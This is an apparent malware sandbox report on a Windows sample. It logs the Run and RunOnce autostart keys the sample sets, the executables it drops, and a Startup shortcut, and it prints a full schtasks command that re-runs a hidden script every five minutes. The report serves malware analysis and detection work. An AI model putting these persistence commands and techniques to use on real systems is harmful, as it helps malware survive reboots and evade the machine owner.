File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework

Drops PE files to the user root directory

Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe

File created: C:\Users\user\Windows.exe

Jump to dropped file

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

File created: C:\Windows\Tasks\Hkbsse.job

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft Subsystem Framework

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_006359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		19_2_006359B3
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		19_2_005C5EDA

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005D33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_005D33B7

Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
